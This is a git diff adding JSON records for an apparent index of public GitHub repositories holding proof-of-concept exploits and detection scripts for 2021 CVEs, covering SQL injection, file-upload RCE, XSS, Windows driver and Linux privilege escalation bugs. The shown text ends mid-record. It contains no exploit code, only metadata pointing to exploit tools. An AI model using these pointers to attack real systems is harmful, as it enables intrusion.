--- /dev/null
+++ b/2021/CVE-2021-42667.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 424371514,
+ "name": "CVE-2021-42667",
+ "full_name": "0xDeku\/CVE-2021-42667",
+ "owner": {
+ "login": "0xDeku",
+ "id": 93016131,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4",
+ "html_url": "https:\/\/github.com\/0xDeku"
+ },
+ "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42667",
+ "description": "CVE-2021-42667 - SQL Injection vulnerability in the Online event booking and reservation system.",
+ "fork": false,
+ "created_at": "2021-11-03T20:31:30Z",
+ "updated_at": "2022-04-24T13:54:52Z",
+ "pushed_at": "2022-03-24T18:10:23Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42668.json b/2021/CVE-2021-42668.json
new file mode 100644
index 0000000000..edd84e5e3b
--- /dev/null
+++ b/2021/CVE-2021-42668.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 424374708,
+ "name": "CVE-2021-42668",
+ "full_name": "0xDeku\/CVE-2021-42668",
+ "owner": {
+ "login": "0xDeku",
+ "id": 93016131,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4",
+ "html_url": "https:\/\/github.com\/0xDeku"
+ },
+ "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42668",
+ "description": "CVE-2021-42668 - SQL Injection vulnerability in the Engineers online portal system. ",
+ "fork": false,
+ "created_at": "2021-11-03T20:43:30Z",
+ "updated_at": "2022-04-24T13:54:50Z",
+ "pushed_at": "2022-03-24T18:11:35Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42669.json b/2021/CVE-2021-42669.json
new file mode 100644
index 0000000000..ecb2026ad0
--- /dev/null
+++ b/2021/CVE-2021-42669.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 424376895,
+ "name": "CVE-2021-42669",
+ "full_name": "0xDeku\/CVE-2021-42669",
+ "owner": {
+ "login": "0xDeku",
+ "id": 93016131,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4",
+ "html_url": "https:\/\/github.com\/0xDeku"
+ },
+ "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42669",
+ "description": "CVE-2021-42669 - Remote code execution via unrestricted file upload vulnerability in the Engineers online portal system.",
+ "fork": false,
+ "created_at": "2021-11-03T20:52:08Z",
+ "updated_at": "2023-07-19T11:57:32Z",
+ "pushed_at": "2022-07-12T20:00:14Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42670.json b/2021/CVE-2021-42670.json
new file mode 100644
index 0000000000..0f2079a198
--- /dev/null
+++ b/2021/CVE-2021-42670.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 424385119,
+ "name": "CVE-2021-42670",
+ "full_name": "0xDeku\/CVE-2021-42670",
+ "owner": {
+ "login": "0xDeku",
+ "id": 93016131,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4",
+ "html_url": "https:\/\/github.com\/0xDeku"
+ },
+ "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42670",
+ "description": "CVE-2021-42670 - SQL Injection vulnerability in the Engineers online portal system. ",
+ "fork": false,
+ "created_at": "2021-11-03T21:25:43Z",
+ "updated_at": "2022-04-24T13:54:49Z",
+ "pushed_at": "2022-03-24T18:12:05Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42671.json b/2021/CVE-2021-42671.json
new file mode 100644
index 0000000000..15d35fdf33
--- /dev/null
+++ b/2021/CVE-2021-42671.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 424387160,
+ "name": "CVE-2021-42671",
+ "full_name": "0xDeku\/CVE-2021-42671",
+ "owner": {
+ "login": "0xDeku",
+ "id": 93016131,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4",
+ "html_url": "https:\/\/github.com\/0xDeku"
+ },
+ "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42671",
+ "description": "CVE-2021-42671 - Broken access control vulnerability in the Engineers online portal system. ",
+ "fork": false,
+ "created_at": "2021-11-03T21:34:23Z",
+ "updated_at": "2022-04-24T13:54:43Z",
+ "pushed_at": "2022-03-24T18:12:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42694.json b/2021/CVE-2021-42694.json
new file mode 100644
index 0000000000..0a1fceb23c
--- /dev/null
+++ b/2021/CVE-2021-42694.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 423992286,
+ "name": "CVE-2021-42694",
+ "full_name": "simplylu\/CVE-2021-42694",
+ "owner": {
+ "login": "simplylu",
+ "id": 55274241,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55274241?v=4",
+ "html_url": "https:\/\/github.com\/simplylu"
+ },
+ "html_url": "https:\/\/github.com\/simplylu\/CVE-2021-42694",
+ "description": "Generate malicious files using recently published homoglyphic-attack (CVE-2021-42694)",
+ "fork": false,
+ "created_at": "2021-11-02T20:39:47Z",
+ "updated_at": "2023-09-28T11:32:55Z",
+ "pushed_at": "2023-05-23T19:49:04Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42697.json b/2021/CVE-2021-42697.json
new file mode 100644
index 0000000000..5c3b220cca
--- /dev/null
+++ b/2021/CVE-2021-42697.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 484937723,
+ "name": "CVE-2021-42697",
+ "full_name": "cxosmo\/CVE-2021-42697",
+ "owner": {
+ "login": "cxosmo",
+ "id": 45860802,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45860802?v=4",
+ "html_url": "https:\/\/github.com\/cxosmo"
+ },
+ "html_url": "https:\/\/github.com\/cxosmo\/CVE-2021-42697",
+ "description": "Proof of concept exploit for CVE-2021-42697: Akka HTTP 10.1.x before 10.1.15 and 10.2.x before 10.2.7 can encounter stack exhaustion while parsing HTTP headers, which allows a remote attacker to conduct a Denial of Service attack by sending a User-Agent header with deeply nested comments.",
+ "fork": false,
+ "created_at": "2022-04-24T05:51:24Z",
+ "updated_at": "2022-05-03T22:53:57Z",
+ "pushed_at": "2022-06-26T17:48:26Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42717.json b/2021/CVE-2021-42717.json
new file mode 100644
index 0000000000..93b43e63df
--- /dev/null
+++ b/2021/CVE-2021-42717.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 568496317,
+ "name": "Detection-and-Mitigation-script-for-CVE-2021-42717",
+ "full_name": "EkamSinghWalia\/Detection-and-Mitigation-script-for-CVE-2021-42717",
+ "owner": {
+ "login": "EkamSinghWalia",
+ "id": 106553324,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106553324?v=4",
+ "html_url": "https:\/\/github.com\/EkamSinghWalia"
+ },
+ "html_url": "https:\/\/github.com\/EkamSinghWalia\/Detection-and-Mitigation-script-for-CVE-2021-42717",
+ "description": "Detection and Mitigation script for CVE-2021-42717 -> ModSecurity DoS Vulnerability in JSON Parsing ",
+ "fork": false,
+ "created_at": "2022-11-20T18:01:34Z",
+ "updated_at": "2022-11-20T18:14:53Z",
+ "pushed_at": "2022-11-20T18:22:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42756.json b/2021/CVE-2021-42756.json
new file mode 100644
index 0000000000..e2a5a7c10e
--- /dev/null
+++ b/2021/CVE-2021-42756.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 605630069,
+ "name": "CVE-2021-42756",
+ "full_name": "3ndorph1n\/CVE-2021-42756",
+ "owner": {
+ "login": "3ndorph1n",
+ "id": 126174263,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126174263?v=4",
+ "html_url": "https:\/\/github.com\/3ndorph1n"
+ },
+ "html_url": "https:\/\/github.com\/3ndorph1n\/CVE-2021-42756",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-23T15:10:06Z",
+ "updated_at": "2023-02-23T15:10:49Z",
+ "pushed_at": "2023-02-23T15:10:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42835.json b/2021/CVE-2021-42835.json
new file mode 100644
index 0000000000..0fc6360510
--- /dev/null
+++ b/2021/CVE-2021-42835.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 434362567,
+ "name": "PlEXcalaison",
+ "full_name": "netanelc305\/PlEXcalaison",
+ "owner": {
+ "login": "netanelc305",
+ "id": 50978770,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50978770?v=4",
+ "html_url": "https:\/\/github.com\/netanelc305"
+ },
+ "html_url": "https:\/\/github.com\/netanelc305\/PlEXcalaison",
+ "description": "Plex media server local privilige escalation poc - CVE-2021-42835",
+ "fork": false,
+ "created_at": "2021-12-02T20:18:08Z",
+ "updated_at": "2022-05-24T10:08:43Z",
+ "pushed_at": "2021-12-22T07:48:01Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42913.json b/2021/CVE-2021-42913.json
new file mode 100644
index 0000000000..9dd390b116
--- /dev/null
+++ b/2021/CVE-2021-42913.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 440389065,
+ "name": "CVE-2021-42913",
+ "full_name": "kernel-cyber\/CVE-2021-42913",
+ "owner": {
+ "login": "kernel-cyber",
+ "id": 21226709,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21226709?v=4",
+ "html_url": "https:\/\/github.com\/kernel-cyber"
+ },
+ "html_url": "https:\/\/github.com\/kernel-cyber\/CVE-2021-42913",
+ "description": "Samsung Printer SCX-6X55X Improper Access Control",
+ "fork": false,
+ "created_at": "2021-12-21T04:26:11Z",
+ "updated_at": "2021-12-21T04:51:08Z",
+ "pushed_at": "2021-12-21T04:51:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42948.json b/2021/CVE-2021-42948.json
new file mode 100644
index 0000000000..dc7d868f29
--- /dev/null
+++ b/2021/CVE-2021-42948.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 461312246,
+ "name": "HotelDruid-CVE-2021-42948",
+ "full_name": "dhammon\/HotelDruid-CVE-2021-42948",
+ "owner": {
+ "login": "dhammon",
+ "id": 69738058,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69738058?v=4",
+ "html_url": "https:\/\/github.com\/dhammon"
+ },
+ "html_url": "https:\/\/github.com\/dhammon\/HotelDruid-CVE-2021-42948",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-19T21:01:12Z",
+ "updated_at": "2022-02-19T21:01:12Z",
+ "pushed_at": "2022-02-19T21:01:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42949.json b/2021/CVE-2021-42949.json
new file mode 100644
index 0000000000..54d55d5f0c
--- /dev/null
+++ b/2021/CVE-2021-42949.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 461312502,
+ "name": "HotelDruid-CVE-2021-42949",
+ "full_name": "dhammon\/HotelDruid-CVE-2021-42949",
+ "owner": {
+ "login": "dhammon",
+ "id": 69738058,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69738058?v=4",
+ "html_url": "https:\/\/github.com\/dhammon"
+ },
+ "html_url": "https:\/\/github.com\/dhammon\/HotelDruid-CVE-2021-42949",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-19T21:02:42Z",
+ "updated_at": "2022-02-19T21:02:42Z",
+ "pushed_at": "2022-02-19T21:03:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43008.json b/2021/CVE-2021-43008.json
new file mode 100644
index 0000000000..9a32851ea4
--- /dev/null
+++ b/2021/CVE-2021-43008.json
@@ -0,0 +1,44 @@
+[
+ {
+ "id": 437963460,
+ "name": "CVE-2021-43008-AdminerRead",
+ "full_name": "p0dalirius\/CVE-2021-43008-AdminerRead",
+ "owner": {
+ "login": "p0dalirius",
+ "id": 79218792,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79218792?v=4",
+ "html_url": "https:\/\/github.com\/p0dalirius"
+ },
+ "html_url": "https:\/\/github.com\/p0dalirius\/CVE-2021-43008-AdminerRead",
+ "description": "Exploit tool for CVE-2021-43008 Adminer 1.0 up to 4.6.2 Arbitrary File Read vulnerability ",
+ "fork": false,
+ "created_at": "2021-12-13T17:26:49Z",
+ "updated_at": "2024-06-17T00:40:41Z",
+ "pushed_at": "2024-03-16T08:25:52Z",
+ "stargazers_count": 75,
+ "watchers_count": 75,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "adminer",
+ "bugbounty",
+ "cve",
+ "cve-2021-43008",
+ "exploit",
+ "file",
+ "hacking",
+ "pentest",
+ "read",
+ "tool",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 75,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43032.json b/2021/CVE-2021-43032.json
new file mode 100644
index 0000000000..2953fc5402
--- /dev/null
+++ b/2021/CVE-2021-43032.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 422599372,
+ "name": "CVE-2021-43032",
+ "full_name": "SakuraSamuraii\/CVE-2021-43032",
+ "owner": {
+ "login": "SakuraSamuraii",
+ "id": 90020213,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90020213?v=4",
+ "html_url": "https:\/\/github.com\/SakuraSamuraii"
+ },
+ "html_url": "https:\/\/github.com\/SakuraSamuraii\/CVE-2021-43032",
+ "description": "Post authenticated stored-xss in XenForo versions ≤ 2.2.7",
+ "fork": false,
+ "created_at": "2021-10-29T14:09:44Z",
+ "updated_at": "2023-09-19T17:07:22Z",
+ "pushed_at": "2021-10-29T14:41:53Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-43032",
+ "stored-xss-exploit",
+ "xenforo",
+ "xenforo2"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43129.json b/2021/CVE-2021-43129.json
new file mode 100644
index 0000000000..e0077ea3df
--- /dev/null
+++ b/2021/CVE-2021-43129.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 480972575,
+ "name": "CVE-2021-43129",
+ "full_name": "Skotizo\/CVE-2021-43129",
+ "owner": {
+ "login": "Skotizo",
+ "id": 43425616,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43425616?v=4",
+ "html_url": "https:\/\/github.com\/Skotizo"
+ },
+ "html_url": "https:\/\/github.com\/Skotizo\/CVE-2021-43129",
+ "description": "Vulnerability in D2L Brightspace's Learning Management System(LMS)",
+ "fork": false,
+ "created_at": "2022-04-12T21:04:44Z",
+ "updated_at": "2022-10-26T20:41:12Z",
+ "pushed_at": "2022-04-29T06:20:22Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cybersecurity",
+ "exploit",
+ "information-security",
+ "mitre-attack",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43141.json b/2021/CVE-2021-43141.json
new file mode 100644
index 0000000000..c41c8b0b01
--- /dev/null
+++ b/2021/CVE-2021-43141.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 424435988,
+ "name": "CVE-2021-43141",
+ "full_name": "Jeromeyoung\/CVE-2021-43141",
+ "owner": {
+ "login": "Jeromeyoung",
+ "id": 39945364,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4",
+ "html_url": "https:\/\/github.com\/Jeromeyoung"
+ },
+ "html_url": "https:\/\/github.com\/Jeromeyoung\/CVE-2021-43141",
+ "description": "Information about CVE-2021-43141, a reflected XSS in the plan_application section.",
+ "fork": false,
+ "created_at": "2021-11-04T01:34:12Z",
+ "updated_at": "2021-11-04T01:34:13Z",
+ "pushed_at": "2021-11-03T17:57:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43150.json b/2021/CVE-2021-43150.json
new file mode 100644
index 0000000000..3c1ce46055
--- /dev/null
+++ b/2021/CVE-2021-43150.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 584008068,
+ "name": "OpayForMe",
+ "full_name": "Zeyad-Azima\/OpayForMe",
+ "owner": {
+ "login": "Zeyad-Azima",
+ "id": 62406753,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62406753?v=4",
+ "html_url": "https:\/\/github.com\/Zeyad-Azima"
+ },
+ "html_url": "https:\/\/github.com\/Zeyad-Azima\/OpayForMe",
+ "description": "CVE-2021-43150 Exploit for `opay` android app webview",
+ "fork": false,
+ "created_at": "2022-12-31T22:09:56Z",
+ "updated_at": "2023-04-02T18:51:03Z",
+ "pushed_at": "2022-12-31T22:27:43Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "android",
+ "exploit",
+ "flask",
+ "webview"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43217.json b/2021/CVE-2021-43217.json
new file mode 100644
index 0000000000..c0775d9854
--- /dev/null
+++ b/2021/CVE-2021-43217.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 775285832,
+ "name": "EFS_CVE-2021-43217",
+ "full_name": "JolynNgSC\/EFS_CVE-2021-43217",
+ "owner": {
+ "login": "JolynNgSC",
+ "id": 164031233,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164031233?v=4",
+ "html_url": "https:\/\/github.com\/JolynNgSC"
+ },
+ "html_url": "https:\/\/github.com\/JolynNgSC\/EFS_CVE-2021-43217",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-21T05:12:25Z",
+ "updated_at": "2024-05-02T05:16:39Z",
+ "pushed_at": "2024-05-02T05:16:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43224.json b/2021/CVE-2021-43224.json
new file mode 100644
index 0000000000..81633cd8fd
--- /dev/null
+++ b/2021/CVE-2021-43224.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 440359142,
+ "name": "CVE-2021-43224-POC",
+ "full_name": "KaLendsi\/CVE-2021-43224-POC",
+ "owner": {
+ "login": "KaLendsi",
+ "id": 68001644,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68001644?v=4",
+ "html_url": "https:\/\/github.com\/KaLendsi"
+ },
+ "html_url": "https:\/\/github.com\/KaLendsi\/CVE-2021-43224-POC",
+ "description": "Windows Common Log File System Driver POC",
+ "fork": false,
+ "created_at": "2021-12-21T01:51:41Z",
+ "updated_at": "2024-04-08T16:54:21Z",
+ "pushed_at": "2021-12-21T06:57:06Z",
+ "stargazers_count": 94,
+ "watchers_count": 94,
+ "has_discussions": false,
+ "forks_count": 31,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 31,
+ "watchers": 94,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43226.json b/2021/CVE-2021-43226.json
new file mode 100644
index 0000000000..9ec4736dfb
--- /dev/null
+++ b/2021/CVE-2021-43226.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 711778105,
+ "name": "cve-2021-43226PoC",
+ "full_name": "Rosayxy\/cve-2021-43226PoC",
+ "owner": {
+ "login": "Rosayxy",
+ "id": 130039321,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130039321?v=4",
+ "html_url": "https:\/\/github.com\/Rosayxy"
+ },
+ "html_url": "https:\/\/github.com\/Rosayxy\/cve-2021-43226PoC",
+ "description": "a Proof of Concept of cve-2021-43226,stack overflow in Windows driver clfs.sys",
+ "fork": false,
+ "created_at": "2023-10-30T06:47:50Z",
+ "updated_at": "2024-01-17T12:52:09Z",
+ "pushed_at": "2023-10-30T07:34:32Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43229.json b/2021/CVE-2021-43229.json
new file mode 100644
index 0000000000..b9db202750
--- /dev/null
+++ b/2021/CVE-2021-43229.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 500853465,
+ "name": "CVE-2021-43229",
+ "full_name": "Citizen13X\/CVE-2021-43229",
+ "owner": {
+ "login": "Citizen13X",
+ "id": 106006863,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106006863?v=4",
+ "html_url": "https:\/\/github.com\/Citizen13X"
+ },
+ "html_url": "https:\/\/github.com\/Citizen13X\/CVE-2021-43229",
+ "description": "CVE-2021-43229 Walkthrough",
+ "fork": false,
+ "created_at": "2022-06-07T13:32:17Z",
+ "updated_at": "2022-07-11T12:36:29Z",
+ "pushed_at": "2022-06-17T16:12:23Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43258.json b/2021/CVE-2021-43258.json
new file mode 100644
index 0000000000..ab2a9908bd
--- /dev/null
+++ b/2021/CVE-2021-43258.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 570827756,
+ "name": "CVE-2021-43258",
+ "full_name": "MRvirusIR\/CVE-2021-43258",
+ "owner": {
+ "login": "MRvirusIR",
+ "id": 22262459,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22262459?v=4",
+ "html_url": "https:\/\/github.com\/MRvirusIR"
+ },
+ "html_url": "https:\/\/github.com\/MRvirusIR\/CVE-2021-43258",
+ "description": "ChurchInfo 1.2.13-1.3.0 Remote Code Execution Exploit",
+ "fork": false,
+ "created_at": "2022-11-26T09:00:10Z",
+ "updated_at": "2023-07-14T23:04:11Z",
+ "pushed_at": "2022-11-26T11:10:35Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43267.json b/2021/CVE-2021-43267.json
new file mode 100644
index 0000000000..908ff55257
--- /dev/null
+++ b/2021/CVE-2021-43267.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 426061438,
+ "name": "CVE-2021-43267-POC",
+ "full_name": "DarkSprings\/CVE-2021-43267-POC",
+ "owner": {
+ "login": "DarkSprings",
+ "id": 90366126,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90366126?v=4",
+ "html_url": "https:\/\/github.com\/DarkSprings"
+ },
+ "html_url": "https:\/\/github.com\/DarkSprings\/CVE-2021-43267-POC",
+ "description": "trusty poc Provide it to legitimate people",
+ "fork": false,
+ "created_at": "2021-11-09T02:14:13Z",
+ "updated_at": "2021-11-09T03:26:22Z",
+ "pushed_at": "2021-11-09T03:26:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 432048812,
+ "name": "CVE-2021-43267",
+ "full_name": "zzhacked\/CVE-2021-43267",
+ "owner": {
+ "login": "zzhacked",
+ "id": 8380809,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8380809?v=4",
+ "html_url": "https:\/\/github.com\/zzhacked"
+ },
+ "html_url": "https:\/\/github.com\/zzhacked\/CVE-2021-43267",
+ "description": "Local PoC exploit for CVE-2021-43267 (Linux TIPC)",
+ "fork": false,
+ "created_at": "2021-11-26T04:00:56Z",
